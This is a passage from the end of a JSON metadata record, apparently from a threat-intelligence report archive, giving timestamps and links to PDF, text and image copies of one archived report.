			"reports": null
		}
	],
	"ts_created_at": 1775434071,
	"ts_updated_at": 1775826757,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1fc6791fb71ecfa5313ee905ad90932325dbacd5.pdf",
		"text": "https://archive.orkl.eu/1fc6791fb71ecfa5313ee905ad90932325dbacd5.txt",
		"img": "https://archive.orkl.eu/1fc6791fb71ecfa5313ee905ad90932325dbacd5.jpg"
	}
}